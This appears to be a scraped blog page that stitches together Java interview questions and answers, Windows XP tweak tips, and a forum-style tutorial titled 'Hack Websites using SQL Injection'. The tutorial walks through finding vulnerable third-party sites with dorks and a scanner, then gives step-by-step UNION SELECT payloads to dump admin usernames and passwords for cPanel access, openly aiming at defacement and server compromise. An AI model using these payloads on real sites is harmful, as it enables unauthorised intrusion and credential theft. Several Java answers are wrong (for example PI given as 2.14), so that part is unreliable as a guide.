        A protected method may only be accessed by classes or interfaces of the same package or by subclasses of the class in which it is declared.

97. What are the legal operands of the instanceof operator?
        The left operand is an object reference or null value and the right operand is a class, interface, or array type.

98. Are true and false keywords?
        The values true and false are not keywords.

99. What happens when you add a double value to a String?
        The result is a String object.

100. What is the diffrence between inner class and nested class?
        When a class is defined within a scope od another class, then it becomes inner class. If the access modifier of the inner class is static, then it becomes nested class.

101. Can an abstract class be final?
        An abstract class may not be declared as final.

102. What is numeric promotion?
        Numeric promotion is the conversion of a smaller numeric type to a larger numeric type, so that integer and floating-point operations may take place. In numerical promotion, byte, char, and short values are converted to int values. The int values are also converted to long values, if necessary. The long and float values are converted to double values, as required.

103. What is the difference between a public and a non-public class?
        A public class may be accessed outside of its package. A non-public class may not be accessed outside of its package.

104. To what value is a variable of the boolean type automatically initialized?
        The default value of the boolean type is false.

105. What is the difference between the prefix and postfix forms of the ++ operator?
        The prefix form performs the increment operation and returns the value of the increment operation. The postfix form returns the current value all of the expression and then performs the increment operation on that value.

106. What restrictions are placed on method overriding?
        Overridden methods must have the same name, argument list, and return type. The overriding method may not limit the access of the method it overrides. The overriding method may not throw any exceptions that may not be thrown by the overridden method.

107. What is a Java package and how is it used?
        A Java package is a naming context for classes and interfaces. A package is used to create a separate name space for groups of classes and interfaces. Packages are also used to organize related classes and interfaces into a single API unit and to control accessibility to these classes and interfaces.

108. What modifiers may be used with a top-level class?
        A top-level class may be public, abstract, or final.

109. What is the difference between an if statement and a switch statement?
        The if statement is used to select among two alternatives. It uses a boolean expression to decide which alternative should be executed. The switch statement is used to select among multiple alternatives. It uses an int expression to determine which alternative should be executed.

110. What are the practical benefits, if any, of importing a specific class rather than an entire package (e.g. import java.net.* versus import java.net.Socket)?
        It makes no difference in the generated class files since only the classes that are actually used are referenced by the generated class file. There is another practical benefit to importing single classes, and this arises when two (or more) packages have classes with the same name. Take java.util.Timer and javax.swing.Timer, for example. If I import java.util.* and javax.swing.* and then try to use "Timer", I get an error while compiling (the class name is ambiguous between both packages). Let's say what you really wanted was the javax.swing.Timer class, and the only classes you plan on using in java.util are Collection and HashMap. In this case, some people will prefer to import java.util.Collection and import java.util.HashMap instead of importing java.util.*. This will now allow them to use Timer, Collection, HashMap, and other javax.swing classes without using fully qualified class names in.

111. Can a method be overloaded based on different return type but same argument type ?
        No, because the methods can be called without using their return type in which case there is ambiquity for the compiler.

112. What happens to a static variable that is defined within a method of a class ?
        Can't do it. You'll get a compilation error.

113. How many static initializers can you have ?
        As many as you want, but the static initializers and class variable initializers are executed in textual order and may not refer to class variables declared in the class whose declarations appear textually after the use, even though these class variables are in scope.

114. What is the difference between method overriding and overloading?
        Overriding is a method with the same name and arguments as in a parent, whereas overloading is the same method name but different arguments

115. What is constructor chaining and how is it achieved in Java ?
        A child object constructor always first needs to construct its parent (which in turn calls its parent constructor.). In Java it is done via an implicit call to the no-args constructor as the first statement.

116. What is the difference between the Boolean & operator and the && operator?
        If an expression involving the Boolean & operator is evaluated, both operands are evaluated. Then the & operator is applied to the operand. When an expression involving the && operator is evaluated, the first operand is evaluated. If the first operand returns a value of true then the second operand is evaluated. The && operator is then applied to the first and second operands. If the first operand evaluates to false, the evaluation of the second operand is skipped.

117. Which Java operator is right associative?
        The = operator is right associative.

118. Can a double value be cast to a byte?
        Yes, a double value can be cast to a byte.

119. What is the difference between a break statement and a continue statement?
        A break statement results in the termination of the statement to which it applies (switch, for, do, or while). A continue statement is used to end the current loop iteration and return control to the loop statement.

120. Can a for statement loop indefinitely?
        Yes, a for statement can loop indefinitely. For example, consider the following: for(;;);

121. To what value is a variable of the String type automatically initialized?
        The default value of an String type is null.

122. What is the difference between a field variable and a local variable?
        A field variable is a variable that is declared as a member of a class. A local variable is a variable that is declared local to a method.

123. How are this() and super() used with constructors?
        this() is used to invoke a constructor of the same class. super() is used to invoke a superclass constructor.

124. What does it mean that a class or member is final?
        A final class cannot be inherited. A final method cannot be overridden in a subclass. A final field cannot be changed after it's initialized, and it must include an initializer statement where it's declared.

125. What does it mean that a method or class is abstract?
        An abstract class cannot be instantiated. Abstract methods may only be included in abstract classes. However, an abstract class is not required to have any abstract methods, though most of them do. Each subclass of an abstract class must override the abstract methods of its superclasses or it also should be declared abstract.

126. What is a transient variable?
        Transient variable is a variable that may not be serialized.

127. How does Java handle integer overflows and underflows?
        It uses those low order bytes of the result that can fit into the size of the type allowed by the operation.

128. What is the difference between the >> and >>> operators?
        The >> operator carries the sign bit when shifting right. The >>> zero-fills bits that have been shifted out.

129. Is sizeof a keyword?
        The sizeof operator is not a keyword.

JAVA Interview Question And Answer

31. Can you give few examples of final classes defined in Java API?
       java.lang.String, java.lang.Math are final classes.

32. How is final different from finally and finalize()?
        final is a modifier which can be applied to a class or a method or a variable. final class can't be inherited, final method can't be overridden and final variable can't be changed.

       finally is an exception handling code section which gets executed whether an exception is raised or not by the try block code segment.

       finalize() is a method of Object class which will be executed by the JVM just before garbage collecting object to give a final chance for resource releasing activity.

33. Can a class be declared as static?
        We can not declare top level class as static, but only inner class can be declared static.
       public class Test
       {
        static class InnerClass
        {
        public static void InnerMethod()
        { System.out.println("Static Inner Class!"); }
        }
        public static void main(String args[])
        {
        Test.InnerClass.InnerMethod();
        }
       }
       //output: Static Inner Class!

34. When will you define a method as static?
        When a method needs to be accessed even before the creation of the object of the class then we should declare the method as static.

35. What are the restriction imposed on a static method or a static block of code?
        A static method should not refer to instance variables without creating an instance and cannot use "this" operator to refer the instance.

36. I want to print "Hello" even before main() is executed. How will you acheive that?
        Print the statement inside a static block of code. Static blocks get executed when the class gets loaded into the memory and even before the creation of an object. Hence it will be executed before the main() method. And it will be executed only once.

37. What is the importance of static variable?
        static variables are class level variables where all objects of the class refer to the same variable. If one object changes the value then the change gets reflected in all the objects.

38. Can we declare a static variable inside a method?
        Static varaibles are class level variables and they can't be declared inside a method. If declared, the class will not compile.

39. What is an Abstract Class and what is it's purpose?
        A Class which doesn't provide complete implementation is defined as an abstract class. Abstract classes enforce abstraction.

40. Can a abstract class be declared final?
        Not possible. An abstract class without being inherited is of no use and hence will result in compile time error.

41. What is use of a abstract variable?
        Variables can't be declared as abstract. only classes and methods can be declared as abstract.

42. Can you create an object of an abstract class?
        Not possible. Abstract classes can't be instantiated.

43. Can a abstract class be defined without any abstract methods?
        Yes it's possible. This is basically to avoid instance creation of the class.

44. Class C implements Interface I containing method m1 and m2 declarations. Class C has provided implementation for method m2. Can i create an object of Class C?
        No not possible. Class C should provide implementation for all the methods in the Interface I. Since Class C didn't provide implementation for m1 method, it has to be declared as abstract. Abstract classes can't be instantiated.

45. Can a method inside a Interface be declared as final?
        No not possible. Doing so will result in compilation error. public and abstract are the only applicable modifiers for method declaration in an interface.

46. Can an Interface implement another Interface?
        Intefaces doesn't provide implementation hence a interface cannot implement another interface.

47. Can an Interface extend another Interface?
        Yes an Interface can inherit another Interface, for that matter an Interface can extend more than one Interface.

48. Can a Class extend more than one Class?
        Not possible. A Class can extend only one class but can implement any number of Interfaces.

49. Why is an Interface be able to extend more than one Interface but a Class can't extend more than one Class?
        Basically Java doesn't allow multiple inheritance, so a Class is restricted to extend only one Class. But an Interface is a pure abstraction model and doesn't have inheritance hierarchy like classes(do remember that the base class of all classes is Object). So an Interface is allowed to extend more than one Interface.

50. Can an Interface be final?
        Not possible. Doing so so will result in compilation error.

51. Can a class be defined inside an Interface?
        Yes it's possible.

52. Can an Interface be defined inside a class?
        Yes it's possible.

53. What is a Marker Interface?
        An Interface which doesn't have any declaration inside but still enforces a mechanism.

54. Which object oriented Concept is achieved by using overloading and overriding?
        Polymorphism.

55. Why does Java not support operator overloading?
        Operator overloading makes the code very difficult to read and maintain. To maintain code simplicity, Java doesn't support operator overloading.

56. Can we define private and protected modifiers for variables in interfaces?
        No.

57. What is Externalizable?
        Externalizable is an Interface that extends Serializable Interface. And sends data into Streams in Compressed Format. It has two methods, writeExternal(ObjectOuput out) and readExternal(ObjectInput in)

58. What modifiers are allowed for methods in an Interface?
        Only public and abstract modifiers are allowed for methods in interfaces.

59. What is a local, member and a class variable?
       
       Variables declared within a method are "local" variables.
       Variables declared within the class i.e not within any methods are "member" variables (global variables).
       Variables declared within the class i.e not within any methods and are defined as "static" are class variables.

60. What is an abstract method?
        An abstract method is a method whose implementation is deferred to a subclass.

JAVA Interview Question and Answer

1. What is the most important feature of Java?
        Java is a platform independent language.

2. What do you mean by platform independence?
        Platform independence means that we can write and compile the java code in one platform (eg Windows) and can execute the class in any other supported platform eg (Linux,Solaris,etc).

3. What is a JVM?
        JVM is Java Virtual Machine which is a run time environment for the compiled java class files.

4. Are JVM's platform independent?
        JVM's are not platform independent. JVM's are platform specific run time implementation provided by the vendor.

5. What is the difference between a JDK and a JVM?
        JDK is Java Development Kit which is for development purpose and it includes execution environment also. But JVM is purely a run time environment and hence you will not be able to compile your source files using a JVM.

6. What is a pointer and does Java support pointers?
        Pointer is a reference handle to a memory location. Improper handling of pointers leads to memory leaks and reliability issues hence Java doesn't support the usage of pointers.

7. What is the base class of all classes?
        java.lang.Object

8. Does Java support multiple inheritance?
        Java doesn't support multiple inheritance.

9. Is Java a pure object oriented language?
        Java uses primitive data types and hence is not a pure object oriented language.

10. Are arrays primitive data types?
        In Java, Arrays are objects.

11. What is difference between Path and Classpath?
        Path and Classpath are operating system level environment variales. Path is used define where the system can find the executables(.exe) files and classpath is used to specify the location .class files.

12. What are local variables?
        Local varaiables are those which are declared within a block of code like methods. Local variables should be initialised before accessing them.

13. What are instance variables?
        Instance variables are those which are defined at the class level. Instance variables need not be initialized before using them as they are automatically initialized to their default values.

14. How to define a constant variable in Java?
        The variable should be declared as static and final. So only one copy of the variable exists for all instances of the class and the value can't be changed also. static final int PI = 2.14; is an example for constant.

15. Should a main() method be compulsorily declared in all java classes?
        No not required. main() method should be defined only if the source class is a java application.

16. What is the return type of the main() method?
        Main() method doesn't return anything hence declared void.

17. Why is the main() method declared static?
        main() method is called by the JVM even before the instantiation of the class hence it is declared as static.

18. What is the arguement of main() method?
        main() method accepts an array of String object as arguement.

19. Can a main() method be overloaded?
        Yes. You can have any number of main() methods with different method signature and implementation in the class.

20. Can a main() method be declared final?
        Yes. Any inheriting class will not be able to have it's own default main() method.

21. Does the order of public and static declaration matter in main() method? No. It doesn't matter but void should always come before main().

22. Can a source file contain more than one class declaration?
        Yes a single source file can contain any number of Class declarations but only one of the class can be declared as public.

23. What is a package?
        Package is a collection of related classes and interfaces. package declaration should be first statement in a java class.

24. Which package is imported by default?
        java.lang package is imported by default even without a package declaration.

25. Can a class declared as private be accessed outside it's package?
        Not possible.

26. Can a class be declared as protected?
        A class can't be declared as protected. only methods can be declared as protected.

27. What is the access scope of a protected method?
        A protected method can be accessed by the classes within the same package or by the subclasses of the class in any package.

28. What is the purpose of declaring a variable as final?
        A final variable's value can't be changed. final variables should be initialized before using them.

29. What is the impact of declaring a method as final?
        A method declared as final can't be overridden. A sub-class can't have the same method signature with a different implementation.

30. I don't want my class to be inherited by any other class. What should i do?
        You should declared your class as final. But you can't define your class as final, if it is an abstract class. A class declared as final can't be extended by any other class.

Sunday, 26 May 2013

Do you know you can have Virtual Desktops (like in Linux) with PowerToys ?

If you have powertoys installed on Windows XP Its available for free at Microsoft download webpage. It is very easy to enable Microsoft Virtual Desktop Feature. Simply right click on the Start Panel Bar also called TaskBar, Click on Tool Bar and select Desktop manager.
You would see a set of 5 icons placed on the right portion of the TAskBar. Click on number 1 to 4 to go to any of the desktops. Now you have have four different Active Desktops.
IMPORTANT NOTE: You may see a little degradation in performance.

Use a Shortcut to Local Area Network Connection Information

Here's something new in Windows XP, instead of using the command line program and typing ipconfig to get local area network information, you can try using the following shortcut:
* Click on Start, point to Connect to, and then click Show All Connections.
* Right–click the connection you want information about, and then click Status.
* In the connection Properties dialog box, click the Support tab.
* For more information, click on the Advanced tab.


To automatically enable the status monitor each time the connection is active, in the connection Properties dialog box, select the Show icon in taskbar notification area when connected check box.

Speedup boot up sequence by defragmenting all key boot files

Open Registry by going to START-RUN and typing REGEDIT. Navigate to 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction. 

In right hand panel look for Enable. Right click on it and set it 'Y' for enable. This is the way I have it set on my computer. This will help speedup boot time.


Use a Shortcut to Local Area Network Connection Information:

How to login as administrator if you don't see it available

Unless and until you have run into issues and fixing XP (under which case you have to go to Safe Mode to login as Administrator), you can get to administrator screen by simply pressing CTRL+ALT+DELETE twice at the main screen.

Are you missing icons

Are you missing icons? You may be wondering where all the icons from your desktop are in Windows XP? Well if you're like me, you like to have at least My Computer, My Network Places, and My Documents on the your desktop.
You need to:
* Right-click on the desktop, and then click Properties.
* Click the Desktop tab and then click on Customize Desktop.
* Put a check mark in the box next to My Document, My Computer, My Network Places, or Internet Explorer, to add those familiar icons to your desktop. Easy yes!

How to improve on shutdown time ? Close apps automatically & quickly at shutdown

Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.

In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)

Want to remove shared documents folder from My Computer window

Some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key 

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders 

You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.

Unlock Toolbars to Customize Them

The new Windows XP now features locking toolbars, and you can adjust them. You may customize a lot of the Windows XP features such as the Taskbar, Start Menu, and even toolbar icons in Internet Explorer and Outlook Express. Remember your right-click:

* Right-click on a toolbar, and then click Lock the Toolbars to remove the check mark.
* Right-click on the toolbar again, and then click Customize.


You may add or remove toolbar buttons, change text options and icon options. When you've got the toolbar customized, click Close. Now right-click on the toolbar and then click Lock the Toolbars to lock them in place. com

How to stop new programs installed balloon from coming up


Right click on START button and select properties. Click on Customize and go to Advanced tab and deselect check box saying "Highlight newly installed programs". This would help you stop this annoying feature from popping up every now and then.

How to remove recycle bin from your desktop

Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry 

 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}


 and delete it. This action should remove recycle bin from your desktop.

Display Your Quick Launch Toolbar Tip

Is your Quick Launch toolbar missing from the taskbar?
To display your familiar Quick Launch toolbar:
Right-click an empty area on the taskbar, click Toolbars, and then click Quick Launch.

Easy as that your Quick Launch bar appears. To add items to your Quick Launch toolbar, click the icon for the program you want to add, and drag it to the Quick Launch portion of the taskbar.

Hack Websites using SQL Injection

Code:
index.php?id=



After you have chose a dork like above, copy it into your clipboard for further use. Now open your exploit scanner.exe. (scanner made by reiluke). At the top where it says "Dork" your going to want to paste your dork into the box.



Atfer you have done this your going to want to switch your "Max Url" from 100 to 1000 for alot of search results. Then press scan on your exploit scanner. After it is done scanning your going to press "Test Sites". After all this is done you should have two lists.




After it is done testing all scanned sites. These pre-tested sites might be sqli vulnerable. But you must first check each site individually. To test a individual site add a " ' " after the url. For example.
Code:
sqlivulnerablesite.com/index.php?id=1'



*NOTE* With this exploit scanner it auto-quotes all the urls.

Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1



Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--



Load the page. If the page loads correctly with that code injection in the url then we are on the right track 

Knowing that there is already 1 column in this database we do another code injection. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--



If the page loads correctly again then this attack can still be performed.

Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10. 

*NOTE* If you load the web page on a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--



and you get a result like this.
Code:
Unknown column '10' in 'order clause'



Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--



If your page loads correctly then this means there is 9 columns in the database 

The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--



After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9



When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--



After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--



*NOTE* Here (x) is the ascii value of the table name.

Now we must find the ascii value of the word admins. 


The ascii value of admins is
Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;



Delete all the ";" , "#" , and "&". So it should look like this.
Code:
97,100,109,105,110,115



Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--



When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --



*NOTE* (0x3a) is the ascii value of the column name

When the page loads it should show the data of the username and password for cpanel access.

Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise. 

Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!